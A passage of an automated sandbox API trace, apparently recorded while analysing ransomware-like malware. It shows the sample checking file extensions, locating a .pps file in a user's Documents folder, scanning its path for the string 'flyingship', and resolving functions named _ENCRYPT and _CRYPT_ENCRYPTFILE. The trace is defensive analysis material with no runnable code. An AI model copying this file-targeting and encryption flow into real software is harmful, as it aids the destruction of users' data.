lpMsg=0x87f3fc) returned 0 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.197] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.197] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0179.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.198] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.198] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.198] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.198] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.198] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.199] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.199] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0179.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.199] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.199] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.199] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.199] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.199] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0x90add8 [0179.200] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.200] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 0x90add8 [0179.201] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.201] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.202] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="izNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zNb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nb7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OKQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KQSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QSO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SO_3S.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.203] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.203] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.203] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.203] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.204] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.204] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 